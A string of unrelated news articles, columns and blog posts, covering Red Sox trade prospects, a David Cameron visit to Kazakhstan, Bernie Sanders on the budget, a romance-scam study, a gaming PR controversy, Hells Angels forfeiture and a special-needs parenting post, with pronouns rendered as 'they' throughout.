Rafael Devers is a name that is high on both the prospect list and coveted by other teams. A young left-hand hitter with potential that is compared to Gregory Polanco – at least by me. Does Devers go? If it is Sale you better believe it. Then again, the internal working of baseball operations may view Moncada a better future option at third than Devers or the other way around.
The fast rising Mauricio Dubon has a certain appeal since their hitting and fielding have steadily improved. The left-hand hitting shortstop will start at Pawtucket and if the hitting continues in the .300 plus range their departure papers could be validated.
There are some other prospects of note who may find employment elsewhere, such as the once promising Brian Johnson. Johnson, a left-hand pitcher, had personal issues, an injury and some less than steady control put them into a questionable range.
Johnson and fellow lefty Henry Owens are both what is referred to as “trade filler” in that their promise is now stained and that impacts value. They become part of packages with either a legitimate up on lights prospect or coupled with a major league player such as Jackie Bradley. Neither Johnson nor Owens appears part of Boston's future.
The Red Sox are certainly willing to shuffle a top pitching prospect elsewhere and that was demonstrated with Anderson Espinoza being sent elsewhere. That left hard-throwing or should I say extremely hard throwing Michael Kopech as the arm du jour of note.
Kopech isn't going anywhere. This is not only a power arm but one that is far from just a one trick pony tossing heat. The kid has a few other toys in the pitching tool box along with the attitude of a viper. Kopech still has a case of the walks to deal with, but they are a keeper.
Several others in the system you may see as part of packages or lesser deals. Michael Chavis, Trey Ball, and Nick Longhi still are works in progress who have value and may be sent elsewhere. That is what happens when progress stalls or there is a glut at a certain position.
I expect the Red Sox to do some dealing this offseason and I also expect to see the names I have placed out to be part of the movement. Just who is depending upon the needs of others, internal evaluations and what potential returns may be.
Get the biggest daily stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
IT may be 2500 miles from Edinburgh but the top issue for students of politics in Kazakhstan is ... Scottish independence.
David Cameron was taken aback yesterday to be quizzed on the pros and cons of separation in the first question they took from students at Nazarbayev University in the capital, Astana.
Cameron staged the session during a trade mission to the central Asian republic.
The questions were supposed to be vetted beforehand and they were surprised when they were asked for their opinion on the referendum issue.
A student called Agrem, who spent four years as a student in Scotland, wanted to know what the Prime Minister of Britain thought of independence.
A bemused Cameron replied: “Very good. It may well seem a long, long way here in Kazakhstan but it is a very important question in the United Kingdom.”
They quickly found their stride with a standard reply about Scotland and England being “stronger, more
prosperous, safer and better off together”.
And they added: “I hope when you come back to Scotland, it is still part of the UK.”
Cameron handled the exchange with ease but some of the UK Government entourage were mildly exasperated. One official said: “You go halfway around the world and what's the first thing they want to know about – Alex Salmond.”
Later, Cameron received a glowing endorsement from Kazakhstan's president, Nursultan Nazarbayev.
The dictator first told the visiting PM to stop lecturing them on human rights – then lavished praise on them at a joint press conference.
The Kazakh strongman declared: “I would vote for him, personally.”
Cameron desperately tried to laugh off the embarrassing words of support, which came after they spent an evening cosying up to the aging autocrat in a bar called The Irish Pub.
But they were also left red-faced over Britain's refusal to grant a visa to a Kazakh artist who has no hands because they could not provide fingerprints.
Buy Photo Sen. Bernie Sanders, I-Vt., in Washington on Friday said they plan to fight Republican efforts that could lead to a 20 percent cut in Social Security disability benefits for 11 million people. (Photo: NICOLE GAUDIANO/FREE PRESS)Buy Photo
CLOSE Vermont Sen. Bernie Sanders discusses financial hardships facing many Americans in this exclusive interview with the Burlington Free Press. NICOLE GAUDIANO/FREE PRESS
The Senate Budget Committee faces "fundamental disagreements" this year, especially if Republicans try to cut Social Security, Sen. Bernie Sanders said Friday.
The Vermont independent, the committee's top-ranking minority member, said they will do everything possible to oppose any Republican budget similar to last year's budget passed by the House. That proposal sought to cut Medicare, Medicaid, education, nutrition and affordable housing programs while providing tax breaks for wealthy Americans and large corporations, they said.
"When you look at a budget, it is imperative that you look at the overarching reality of American life," they said during the Friday news conference. "And today when we look at America, we have to understand that we have an obscene level of income and wealth inequality, the highest of any major country on earth, and worse in America today than at any time since 1929."
Last year's House-passed budget resolution would have balanced the budget within 10 years with $5.1 trillion in cuts. It called for increased military spending and decreased non-defense spending, and it would have cut programs serving the poor while changing Medicare into a voucher program and raising the program's eligibility age over time.
"You can boil the differences down to one question: Who knows better? The people or Washington?" former House Budget Committee Chairman Paul Ryan of Wisconsin said before the House vote in April. "We have made our choice with this budget."
Sanders said the budget should address the needs of a declining middle class and a wealth gap in which the richest one-tenth of 1 percent own nearly as much wealth as the least-wealthy 90 percent. As poverty among the elderly increases, Sanders said, Social Security benefits need to be protected and expanded.
They assailed a rules change by House Republicans that they said could lead to a 20 percent cut in Social Security disability benefits for 11 million Americans. The rule would make it tougher to transfer money from the entitlement program's retirement fund to replenish its disability fund, something that's been done 11 times. Republicans say the goal is to protect retirees' benefits.
"In the midst of massive wealth and income inequality, the Republicans on their very first day of the new session want to make massive cuts in a program that benefits some of the most vulnerable people in this country, people with disabilities," Sanders said.
Additionally, House Budget Committee Chairman Tom Price of Georgia has said increasing the eligibility age for Social Security and other ideas should be on the table. Ryan stayed clear of such proposals last year.
"This is a program that right now on its current course will not be able to provide 75 or 80 percent of the benefits that individuals have paid into (it) in a relatively short period of time," Price said Monday during a speech at the Heritage Action for America Conservative Policy Summit. "Whether it's means testing, whether it's increasing the age of eligibility... all those things ought to be on the table and discussed."
President Barack Obama has previously supported a proposal to slow the increase of Social Security benefits over time, but that plan is not expected to be in the proposed fiscal 2016 budget the White House will release Feb. 2, Sanders said.
Sanders, who is considering a presidential bid, said they intend to use their position on the committee to rally Americans. They will be "extremely aggressive" on social media and work to put together large coalitions of seniors and veterans to help move their agenda, they said.
They said they and Senate Budget Committee Chairman Mike Enzi, R-Wyo., who also serves with Sanders on the Health, Education, Labor and Pensions Committee, have "very different views of the world."
"I like Mike and we'll work together as best as we can," they said
Sanders said they are working on legislation to expand Social Security benefits. They previously introduced legislation to raise the $118,500 cap on taxable income for contributions to Social Security.
They support basing the Joint Strike Fighter jet — the most expensive weapons project ever — at the Air Guard station at Burlington International Airport. But they said cost-overruns by defense contractors have "got to change."
The budget also should target profitable corporations and wealthy Americans who are avoiding taxes by stashing cash in offshore tax havens, they said.
"If we are serious about dealing with the massive problems facing our country, this is an issue that must be addressed and certainly addressed before we talk about cutting programs for the elderly and the children," they said.
RELATED:
Copyright 2015 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.
Read or Share this story: http://bfpne.ws/1IR0lbL
Special counsel Robert Mueller has interviewed a cybersecurity expert who claims they were "recruited to collude with the Russians" in the 2016 election, Business Insider reported Tuesday.
Matt Tait, a former information security specialist for Britain's Government Communications Headquarters was interviewed weeks ago by Mueller, according to a source familiar with the investigation.
Tait claimed that they were recruited by a longtime GOP operative tied to the Trump campaign, Peter W. Smith, to obtain emails deleted from Hillary Clinton's private email server that they believed were hacked by the Russians.
ADVERTISEMENT
Smith reportedly told people during their investigation that they were affiliated with President Trump's former national security adviser, Michael Flynn.
In an article titled "The Time I Got Recruited to Collude with the Russians," Tait told Lawfareblog.com in June that Smith approached them during the campaign for help determining the veracity of emails Smith said they received from "dark web hackers."
"Smith implied that they were a well-connected Republican political operative," Tait wrote. They added that Smith believed "Clinton's private email server had been hacked—in their view almost certainly both by the Russian government and likely by multiple other hackers too."
"From [Smith's] perspective it didn't matter who had taken the emails, or their motives for doing so," Taid continued. "He never expressed to me any discomfort with the possibility that the emails they were seeking were potentially from a Russian front, a likelihood they were happy to acknowledge."
"We knew the people who had these were probably around the Russian government," Smith told The Wall Street Journal in May.
Smith killed themselves days after speaking to Journal about their efforts.
The House Intelligence Committee interviewed Tait as part of its investigation earlier this month, CNN reported.
Image caption Smooth talking con artists promise love, but are only after money
More than 200,000 people in the UK may have fallen victim to criminals who woo them online to steal their money.
The first formal study of so-called romance scams found that they were far more common than previously thought.
Among those surveyed by researchers at the University of Leicester, one in 50 knew someone who had been a victim.
Perpetrators typically set up a fake profile, pretend to enter into an online relationship then ask for cash to help with financial problems.
Police advice to the public is never to give money to anyone that they have only met over the internet.
The Leicester University team found that more than half (52%) of the 2,000 people surveyed for the study had heard of the scam with 2% personally knowing someone who had been targeted.
Double hit
Action Fraud, the national fraud reporting and advice centre run by the National Fraud Authority, identified 592 victims between 2010 and 2011.
However, the researchers believe that many more probably goes unreported.
"It may well be that the shame and upset experienced by the victims deters them," said Prof Monica Whitty.
They explained that the psychological impact could be huge and suggested that new methods of reporting the crime were needed.
"It is our view that the trauma caused by this scam is worse than any other, because of the 'double hit' experienced by the victims - loss of monies and a 'romantic relationship'," said Prof Whitty.
Grooming
The criminals who carry out romance scams typically use online dating sites or social networks to identify targets and devote time and effort to "grooming" them, according to the Serious Organised Crime Agency (Soca).
Media playback is unsupported on your device Media caption Nicola Hillary: "It turns out they were dating several of us and they had completely different persona for each."
It said that most will attempt to move the relationship away from monitored online places before defrauding people.
Soca view romance fraud as organised crime, usually operated from outside the UK.
"The perpetrators spend long periods of time grooming their victims, working out their vulnerabilities, and when the time is right... ask for money," said Soca's senior manager for fraud Colin Woodcock.
Investigations by Soca have found that people can give the criminals anything between £50 to £240,000.
In some cases, when they fail to get money out of victims, the criminals ask them to accept money into their account as part of a wider money laundering operation, said Mr Woodcock.
"It is crucial that nobody sends money to someone they meet online, and haven't got to know well and in person," they added.
(Note: At the time of writing, I was awaiting comment from both Paul Christoforo and N-Control. I have reproduced text directly from the Penny Arcade website, and have not corrected for spelling or grammar. There is now an update at the end of the piece after response and a press release from N-Control.)
Gaming is a young industry, and gaming PR and serious game journalism even younger. It makes it an exhilarating industry to work in or to follow, but a perilous place for the unwary - as seen by a lightning exchange of shots over Christmas which leaves an American business in peril.
This gunfight all started innocently enough, with a customer email sent to a marketing department asking for confirmation on whether a gift would arrive in time for Christmas. The product was the Avenger Controller, a cross between a PlayStation game controller and a randy squid.
This remarkable contraption was originally designed by David Kotkin, an art teacher, to help one of their pupils, who suffered from epidermolysis bullosa, to play games for prolonged periods without irritation. When it became clear that its construction also provided benefits for gamers, with and without disabilities, a small business was born.
"Dave", a customer, emailed to ask an update on their order. Initially brief responses from Paul Christoforo of Ocean Marketing, the PR contact for iControl (the manufacturers and distributors of Kotkin's design), unfolded under further questioning into something entirely... other.
Feel free to cancel we need the units were back ordered 11,000 units so your (sic) 2 will be gone fast. Maybe I'll put them on eBay for 150.00 myself. Have a good day Dan.
And that's where it all gets instructive...
Lesson 1: Customers can start bar-room brawls. Bartenders shouldn't
This suggestion was in response to Dave's complaint that he, having preordered more than two months ago, was now seeing a 10% discount offered for new orders - thus apparently punishing them for having handed over their money early. Whether you think this is a valid complaint probably depends on whether you are a vendor or a consumer. Placing an order always involves an implicit risk that you will miss out on a better offer later - I paid around $12 for 'Nuclear Dawn' a week ago, only to find it discounted to $5 in the Steam sale. Que sera sera, c'est la vie, caveat emptor, as my prep school motto reads.
However, Dave was at liberty to threaten to withdraw their order - that's customer escalation. Customer service mocking that liberty as ineffectual is bartender escalation -and that's a very bad idea. Because:
Lesson 2: Mention the Man in Black, and they will hear about it
Even in supposedly private media, such as password-protected blogs or email exchanges, there is a now way to guard against what LiveJournal users call the "cut-and-paste fairies". Whatever you say might end up in a public forum.
In this case, Dave copied their lengthy and quite splenetic response to a number of influential game commentators and news sources. One of these was Penny Arcade (Link NSFW, and contains offensive humour), a multimillion-dollar publishing empire built by Jerry Holkins and Mike Krahulik from humble origins as a gaming webcomic.
Among other things, Penny Arcade organises the Penny Arcade Expos (PAX) - large gaming fan conventions. Which meant that when the PR professional mentioned Boston's PAX East in their reply to the customer:
We do value our customers but sometimes we get children like you we just have to put you in the corner with your im stupid hat on. See you at CES , E3 , Pax East ….? Oh wait you have to ask mom and pa dukes your not an industry professional and you have no money on snap you just got told.
Mike Krahulik's ears pricked up, and they got involved (may contain NSFW language). Leading us neatly on to:
Lesson 3: Without a map, Westward Ho becomes Westward Oh pretty quickly
This, the 'Meek's Cutoff' rule, really should be 101. It isn't just about knowing the major landmarks in your industry, though, but also the best way to to negotiate them.
'Duke Nukem Forever' was such a landmark. One of the longest-delayed games ever, it was finally released in 2011 and heavily criticised. The best PR asset the developers had in response was CEO Randy Pitchford's reputation as a straight shooter with a genuine love of games. When Gearbox picked up the license, in fact, many had said that, if anyone could save an apparently doomed franchise, it was Pitchford. So when the CEO of the Redner Group, handling Duke's launch PR, tweeted:
Too many went too far with their reviews...we are reviewing who gets games next time and who doesn't base on today's venom
They took a prime asset off the board, by focusing attention on the inside baseball of the relationship between PR and press, rather than between players and developers. Take 2 International, the publishers, terminated their relationship with the Redner Group within the day.
Penny Arcade has more than 3 million readers. PAX East is attended by more than 50,000 people. Krahulik is one of the best-connected and most influential independents in games. So, the territory to fight on is probably not who knows who, as happened here:
If we want to be there [at PAX East] we will be there with industry badges or with a booth you think I can't team up with turtle beach , Callibur or Koy Christmas , I can't get Kevin Kelly to pull some strings or G4 , Paul Eibler Ex CEO of take 2 , Rich Larocco Konami , Cliff Blizinski Epic who were working with on a gears version , Activision who were working with on a MW3 and Spider-Man Bundle , The Convention Center Owners themselves , Mayor of Boston come on Bud you run a show that's all you do and lease a center in Cities you have no pull in its all about who you know not what you do.
Once on that road, see Lesson 1. This is the moment where the cocky young gunslinger, having had the run of their small town, picks a fight with the dusty-coated stranger in the corner of the saloon bar only to discover when the hat tips back that they have just challenged Lee van Cleef to a duel. Christoforo at this point, it must be said, did not realise that Krahulik also created Penny Arcade as well as organising the conventions, or how big a deal that was.
Which leads us to...
Lesson 4: If you take that lawyer out of its holster, you'd better be ready to use it
In an update, Krahulik said that they had been told to await a call from Christoforo's attorneys.
Recently a man claiming to represent the Burzynski Clinic issued a series of legal-sounding instructions to bloggers expressing scepticism about the clinic's experimental cancer treatment. In a statement, the Clinic explained that they had hired them as a web optimisation specialist and to "attempt to stop the dissemination of false and inaccurate information concerning Dr. Burzynski and the Clinic".
The Clinic terminated that professional relationship, just as N-Control has with Christoforo, and the same story seems to be playing out here - a small or one-man SEO operation allowing its enthusiasm to exceed its remit. Legal threats, like dire warnings that the Internet Police have been called, need to be followed up swiftly, or they look like a bluff. And being mocked is, in the age of Twitter, arguably worse than being wrong.
Lesson 5: If one of your posse shoots up a town, it'll be your face on the wanted posters
The 'Young Guns II' rule.
One of the advantages big companies have is that they can usually achieve clean breaks: The Redner Group was clearly identified as an external provider of PR services to Take 2 International. The smaller the business, the more friable these barriers may become.
At the time of writing, the phone number on N-Control's "Contact Us" page still goes through to Paul Christoforo's answering message. This is not surprising - often small companies will provide a number that forwards to a contractor's phone, or just use their number. However, it shows that it is harder to untangle a business from actions performed in its name.
Shortly after the story broke, the Amazon page for the Avenger Controller began to be bombed by one-star reviews. Some of these blamed delays in delivery, many were honest in stating that they were posting in response to the Ocean Marketing blow-up. An average rating of 1.5 stars, regardless of their provenance, is a dangerous thing for a games console to have on Amazon.
At the same time, the brand narrative of the product has been dented by the discovery of a registered company with Kotkin - the philanthropic art teacher - and Christoforo named as officers. The new Marketing Manager for N-Control, Eli Schwartz (update - Eli Schwartz apparently appointed themselves Marketing Manager; this title was not conferred by N-Control - see the update at the end of the piece for more detail), has been quick to communicate that this was an idea for a charitable foundation that never went beyond the name.
In fact, N-Control have handled this pretty well - they have acted quickly, moved to disassociate, identified the ongoing problem (Amazon-bombing and brand contamination) and moved to deal with them. The only mistake they made was in giving someone a gun without realising how quickly the Internet can shoot back. Unfortunately, that was enough. On Amazon right now, user after user is pasting up their own "unwanted" poster.
Bonus lesson: Beware the superfan
"Dave", the original complainant, was a fan, and they made a very good point about serving an industry - in this case, hardcore gamers - characterised by fannishness:
We're a demanding, vocal customer [sc. group] but the flip side is we're loyal and eager to spend.
Mike Krahulik is a superfan. They and their partner Jerry Holkins are just like thousands of other gamers who run a blog and draw cartoons about their favorite games - except they are monstrously successful, and have an audience of millions. Which is why so many gamers love them - theirs is a Horatio Alger story of hard work leading to success on their terms. Krahulik has no code of journalistic practice to slow them down, and no boss to rein them in. They get to do what they think is right. And after that, as they say, it's out of their hands:
The reality is that once I had posted the emails I didn't have the power anymore. The Internet had it now and nothing I said or did was going to change that.
Sometimes the momentum of Penny Arcade's long tail of admirers is a force for good - their charity, Child's Play, brings joy in the form of games and consoles to sick children. At other times, the benefits are less clear, such as when Krahulik's baffled and hostile response to feminists unhappy with one of their strips led to a barrage of trolling and threats of sexual violence - none of which they requested, but much of which was done by people believing that they were defending Penny Arcade's good name. As Holkins themselves says of Krahulik:
What I understood at some level was that if I had the choice of being their friend or their enemy, I should choose the former.  They are like a Goddamned animal in many ways and is not to be ****ed with. Especially if you're in the wrong, but even if you think you're right. Even if you are right.
In the Wild West of games PR - a new world where the rules of conduct have yet to be formalised, and enforcement is patchy at best - the superfan is the wandering gunslinger, operating by their own code. Cross them (and it is almost always him), and your best-laid marketing plans might suddenly be full of lead. However, where wandering gunslingers tend to be a solitary breed, the superfan's words have the power to create a flash mob of angry gamers.
Essentially, the superfan is Lee van Cleef, but with a bag containing an infinite number of furious weasels, which will continue to bite your ankles long after they have ridden on to the next town. And, if you pick a fight with The Man in Black (with the bag of infinite weasels), you can guess who is more likely to end up on Boot Hill.
UPDATE - N-Control have released a press release, from their newly-appointed marketing consultant Moisés Chiullan (Eli Schwartz was a high school student helping out with social media who stepped into the breach). This confirms most of the information already released in various ways. Key points:
Paul Christoforo is no longer employed in any capacity by N-Control, has no equity in N-Control and stands to make no profit from Avenger Controller Sales
All PS3 Avenger Controller currently ordered will ship on or before January 15
The $10 discount is now, per Dave's request, extended to all preorders
Delays in delivery are a result of unexpected demand: better delivery estimates will be provided going forward by the new marketing team
Afternoon Artists Inc is a shell company, and exists in name only. (I asked for more detail on this, and it was confirmed that the company was registered but never went into operation. It is probably fair to assume that it will not be spun up at this time.)
Press and customer service inquiries should be directed to AvengerDefender@gmail.com
I also asked some specific questions, which were answered by Chiullan - the key elements being that regaining control over the Avenger Controller web site is ongoing, hence the continued presence of Paul Christoforo's contact details. Probably the key quote from the press release is:
We hope that existing and potential customers (and gamers in general) will at least hear our side of the Avenger story. A great deal of the email received mistakenly assumes that Paul owns the company, or that Ocean Marketing manufactures it, neither of which are remotely true. If those who have posted negative Amazon reviews would be willing to take them down, we would greatly appreciate it, since they're reviewing a guy we fired rather than the actual product.
It's a solid response, in my opinion, and acknowledges the three Oxford-commaed achievements that N-Control have to fulfil as priority: distance themselves from this event, control the fallout, and ship the product. The product has to become the story again, and the only way to do that is to get it into as many hands as possible as quickly as possible.
Find me on Twitter.
After the massive earthquake struck Mexico City last week, a team of Los Angeles firefighters packed their bags and traveled to the areas the hardest hit by the temblor.
After a disaster, depending on the scope, the Urban Search & Rescue team (USAR) is either deployed immediately or put on "alert status" so that its members can prepare to be deployed at a moment's notice and assist USAID operations. The Los Angeles USAR team arrived at 5 a.m. in Mexico City on Thurs., Sept. 21, and have been conducting around-the-clock operations.
L.A.'s USAR crew is a Heavy Type 1 team with 67 personnel, including two doctors, six paramedics and five dogs. Right now, it also has a smaller team in Puerto Rico, which makes it the first time that two separate teams have been simultaneously deployed.
Continue Reading
The L.A. team of doctors and paramedics in Mexico City set up their base of operations in a medical tent, where they plan for rescues, store supplies and care for the rescue dogs. A group of rescue dogs from Tijuana were visiting the site but they did not stay there, instead they shared a compound with rescue teams from Spain and Colombia.
EXPAND Los Angeles firefighters, from left, Jake Armendariz and Gary Durian and their canine search partners, from left, Clancy and Tanker, are part of the Urban Search and Rescue team deployed to help with earthquake rescue efforts. Mallika Vora
For medical specialist Robert Nowaczyk, a born-and-raised Angeleno, Mexico is their fourth international deployment after earthquake responses in Haiti, New Zealand and Nepal. They also took part in relief efforts in New York City on Sept. 11, 2001. The current team went to Japan in addition to the other three countries. Out of all five international deployments over the last 12 years, the team has 11 "saves," where they pulled people from the rubble. They have provided countless other lifesaving services throughout their deployments.
"The response in Mexico has been amazing," Nowaczyk says. "Wherever we go, people are clapping in the streets, offering us food and water. Volunteers are lining up on the street with their hard hats and tools, waiting in line to come get a bucket."
EXPAND Medical specialist Robert Nowaczyk makes preparations in the medical tent. Mallika Vora
There has been joint coordination with Mexican and Israeli search-and-rescue teams at the site of a collapsed building at Álvaro Obregón 286, to continue searching for victims and removing debris. James Lile says there is a lot of cooperation between the local Mexican rescue teams and the international crews like the L.A. County firefighters.
"We realize we're a component of a larger operation, working with other international teams and the host country," Lille says. "We work with the LEMA, local emergency management agency. The plan is continuously re-evaluated to determine where our resources can be most effective."
EXPAND James Lile has been on the Los Angeles County Fire Department for 28 years. Mexico is their fifth international deployment with the Urban Search and Rescue team. Mallika Vora
Originally from Detroit, Lile has spent 28 years on the L.A. County Fire Department, and has also been to Haiti, New Zealand and Nepal for earthquake relief, as well as an exercise in Armenia to help train personnel there to respond to a major quake.
"The folks back home should be very proud of USAR teams, as we represent not only L.A. and USAID but also the United States of America as an agent of good will, expertise and professionalism. We're one of the finest search-and-rescue teams in the world, but that's just my opinion," Lile says with a laugh.
EXPAND L.A. firefighter Jake Armendariz and their canine partner, Clancy; Los Angeles firefighter Travon Espy returns to camp after a long shift searching for survivors; L.A. firefighter Gary Durian and their canine search partner, Tanker. Mallika Vora
USAR team member Gary Durian decided to sign up to become a firefighter during college after their mom, who worked with the fire department, gave them the idea. Durian says, "It's a real privilege to be on an international team — I've been to Haiti, Japan, Nepal — to be able to assist people in dire need, hopefully rescue more survivors, but at least let the people know that we're doing everything possible to help. It's a very gratifying feeling."
After a largely fruitless, eight-year slog through the courts, the B.C. government has performed a U-turn in its bid for the forfeiture of three Hells Angels clubhouses.
And the abrupt move means provincial taxpayers will be footing some of the legal bills for the notorious motorcycle gang.
The provincial Civil Forfeiture Office is now arguing that the biker gang's clubhouses will likely be used to commit future crimes, not that they've been used to commit crimes in the past.
B.C. Supreme Court Justice Barry Davies on Wednesday gave their stamp of approval to that change of tactics, and agreed to combine the government's claims against Hells Angels chapters in Nanaimo, Kelowna and Vancouver's East End into a single trial.
“It is a paradigm shift,” said Phil Tawtel, executive director of the Civil Forfeiture Office. “It's putting in a different emphasis. It's putting what was in the background in the foreground and putting what was in the foreground into the background.”
Since the first claim was filed against the Nanaimo chapter in 2007, Tawtel's office has been repeatedly stymied in its attempts to bring the cases to trial. Government lawyers had advanced claims of past crimes committed by Hells Angels members including extortion and murder, but the judge found those allegations to be lacking in sufficient detail.
The province's change in strategy means all of those allegations have been thrown out in favour of the future crimes argument.
“It's no guarantee of success,” Tawtel acknowledged.
But they added that they were pleased with the judge's approval of the new approach: “It allows us to plead and argue and go to trial with the case we want to go with.”
The major pivot means a financial hit for the province.
Justice Davies has ordered the forfeiture office to pay some of the legal costs incurred by the Hells Angels chapters so far, writing that “the appropriate remedy is one that compensates the defendants for their costs unnecessarily incurred in defending now-abandoned allegations of past unlawful activity.”
Those costs have yet to be tallied.
The judge also expressed some frustration with the long, drawn-out court proceedings to date. This decision marked the province's fifth amendment of its claims against the Nanaimo chapter.
“The consequence of all of those ongoing pleadings issues as well as other interlocutory issues is that substantive resolution … is not now much closer than it was almost eight years ago when the litigation was commenced,” Davies wrote.
The lawyer representing the Hells Angels, Joe Arvay, said they were still studying the judge's decision and not prepared to comment.
Arvay has also filed counterclaims arguing that the Civil Forfeiture Act is unconstitutional. Those arguments will now be heard along with the claims for forfeiture.
Even with this change in direction, the province will still have a tough time proving its case against the Hells Angels, according to Rob Gordon, a criminologist at Simon Fraser University.
“You're still faced with the problem of determining … on the balance of probabilities whether somebody or some group is going to engage in criminal activity,” they said.
“I don't see that they're out of the bog at this point.”
Gordon added that the public should be concerned about how far the B.C. government has strayed from what they called the “gold standard” of civil forfeiture: seizing someone's property after they have been convicted in a criminal court.
“To be saying that we're going to seize the property because we think you might end up engaging in crime is a really nasty slippery slope,” they said.
No date has been set for the case to go to trial.
blindsay@vancouversun.com
Twitter.com/bethanylindsay
Russia's Emergencies Ministry plans to increase humanitarian aid to Ukrainian refugees, which it considers its priority task, Russia's Deputy Emergencies Minister Vladimir Stepanov said.
MOSCOW, August 19 (RIA Novosti) - Russia's Emergencies Ministry plans to increase humanitarian aid to Ukrainian refugees, which it considers its priority task, Russia's Deputy Emergencies Minister Vladimir Stepanov said.
"The number one task at this moment is to help Ukrainian citizens on Russia's territory, to deliver them to the temporary settlements, to provide medical and psychological help, to feed them," Stepanov said, adding that the government was helping with the projects.
"[The work] has been ongoing for more than half a year, and its intensity grows day by day. And that is the top issue on the agenda," they said, adding, “Russia is a leader in providing humanitarian aid worldwide."
Tuesday marks World Humanitarian Day, designated by the United Nations in 2008 to honor humanitarian aid workers who died while carrying out their work.
The Emergencies Ministry collaborates with numerous international organizations, such as the United Nations and its humanitarian and refugee bodies, the World Food Programme, the Shanghai Cooperation Organization (SCO) and the International Committee of the Red Cross (ICRC).
Russia hosts about 58,000 Ukrainian refugees in temporary accommodations across the country. The number increased by almost 6,000 over the past weekend amid ongoing fighting between independence supporters and Ukrainian troops.
In early August, in light of the worsening humanitarian situation in east Ukraine, Russia proposed to the UN Security Council to send an international humanitarian mission with Russian humanitarian aid under the auspices of the ICRC to the troubled Ukrainian regions.
On August 12, 280 trucks carrying about 2,000 tons of humanitarian aid, with 400 tons of grain, 100 tons of sugar, 62 tons of baby food, 54 tons of medicines, 12,000 sleeping bags and 69 mobile power generators set off from the Moscow Region heading toward conflict areas in crisis-torn Ukraine.
Editor's Choice
You don't have to wander long in the liberal commentariat to find projections that the Republican Party is in a death spiral, doomed by demographics, discredited by the dissension among House Republicans, disenchanted with its experienced presidential candidates and despised by the great mass of voters.
There is something to be said for each of these propositions — and yet Republican candidates keep winning elections, as in recent contests in Kentucky, Louisiana, Mississippi and Virginia.
Admittedly, the first three of these states have been solidly Republican in recent presidential and congressional elections, and Americans have increasingly been straight-ticket voters. But state issues do give a non-dominant party a chance to reframe issues across national party lines. And Virginia was the state that voted closest to national percentages in both the 2008 and 2012 presidential elections.
The Kentucky result was particularly striking. Retiring Democratic Gov. Steve Beshear was a big booster of Obamacare and extended Medicaid to many low-income Kentuckians. The Democratic nominee, Attorney General Jack Conway, is an adept politico. Republican nominee Matt Bevin was distrusted by insiders for running in the primary against Sen. Mitch McConnell in 2014, and they had a business record open to attack. Democrats spent about $9 million to Republicans' $5 million. The RealClearPolitics average of public polls showed Conway leading 44 to 41 percent.
But Bevin won by 53 to 44 percent. Conway carried the state's two largest counties, containing Louisville and Lexington. But Bevin carried 106 of the 118 others. As in McConnell's race, the Democrat matched pre-election poll numbers. The Republican exceeded his.
What may be happening is that Republicans are disgruntled with party leaders; their disapproval is largely responsible for the Republican Party getting more unfavorable ratings than the Democratic Party. While they won't outwardly commit to voting Republican, on Election Day they do. This would explain similar phenomena in the 2014 races in Kansas and Virginia.
The results in Louisiana and Mississippi were similar. In Louisiana's all-party primary Oct. 17, three Republican candidates got 57 percent of the vote and three Democrats 42 percent.
But the single prominent Democrat, John Bel Edwards, got 40 percent, and the winner among three prominent Republicans, Sen. David Vitter, got only 23 percent. Vitter, like Bevin, has weaknesses as a candidate and could lose the Nov. 16 runoff. As for Mississippi, Republican Gov. Phil Bryant was re-elected with 67 percent of the vote in a race that wasn't seriously contested.
Some Democrats dismiss their losses as the result of low turnout. Wait till turnout rises to presidential-year levels, they say, and it's inevitable that Democrats will do fine.
Maybe so, but it was Democratic more than Republican turnout that lagged. Kentucky, Louisiana and Mississippi Republicans got more votes than their party's candidates have in all but a few past elections. But in Louisiana and Kentucky Democrats got fewer votes than their counterparts have in elections (except for 1999, not seriously contested in either state) since 1972 and 1967, respectively. The last time a Mississippi Democratic governor candidate got fewer votes was in 1963.
This happened even though Mississippi and Louisiana have higher percentages of blacks than any other state. Spontaneous heavy turnout by blacks made these states two of only five to give Barack Obama higher percentages in 2012 than 2008. But without Obama on the ballot, black turnout dropped sharply — not a good sign for Democrats in 2016 and beyond.
We have been told frequently that a surge of “ascendant” Americans — blacks, Hispanics, Asians, millennials — into the electorate will move it inexorably toward Democrats. But so far the surge hasn't happened. Turnout, particularly Democratic turnout, declined from 2008 to 2012 presidentially and from 2010 to 2014 congressionally. Barack Obama got 3.5 million fewer votes in 2012 than 2008.
Let's finish with Virginia, where Democratic Gov. Terry McAuliffe and former New York Mayor Michael Bloomberg spent millions to win control of the state Senate. They fell short: Republicans maintained their edge and lead 66-34 in the Virginia House of Delegates.
If you add up the votes cast in the state Senate contests, Republicans won 53 percent and Democrats 44 percent — the same numbers as the gubernatorial race in Kentucky. That's not necessarily a forecast of the 2016 result in the nation's current bellwether state. But it doesn't look like a death spiral for Republicans.
Special needs kids FTW! I am discovering this as I engage more in the learning and development of my special needs twins. They may have ‘special needs' but they also have really cool skills. And they continue to surprise and delight us with the things they know and can do.
The reason I'm writing this post is because I'm trying to process the dreaded school report! As I mentioned in my post about why we want to homeschool our special need twins, we believe that our kids just need the chance to show what they can do. But I'm sure most special needs parents can agree that the school report really can knock your confidence.
Special Needs Kids don't Tick all the Boxes
According to the half year Grade R report, my kids are lagging far behind in every section. Apparently they need lots of work in Home Language, Mathematics and Life Skills. Some of the benchmarks that seem quite harsh are ‘doesn't take pride in their work' and ‘doesn't treat friends with respect'. As parents who are passionate about respect in general, it makes us doubt our parenting. At least there are some points that seem possible to overcome. I'm confident I will be able to teach them to hop on one foot!
Special Needs Kids have their Own Special Skills
Obviously there are many considerations when looking at any benchmarking report. Firstly I assume the school report is the result of thorough investigation. Secondly I guess it is there to gauge how children are doing in terms of what is ‘normal'. My issue is that there are some things that are not taken into consideration. For one memory and recall of more complicated items isn't in the rapport. And my kids have that in abundance. Surely that counts for something? Also, is there any such thing as normal these days. And who wants to be normal anyway?
Turning Special Needs Upside Down
But in an effort to try and turn the negative into a positive, I'm going to take this report and turn it upside down. I'm going to start from the top and work my way down. I have already seen that my boys take pride in their work. They were thrilled with the dinosaurs they cut out and coloured in. And they can write their names. I know that in a quieter more personalised environment, they can blossom. I have investigated the practical aspects of homeschooling and this report gives me a good indication of what to teach them. And if they don't manage some of the ‘normal' things, then we will work on the extraordinary.
Over to You
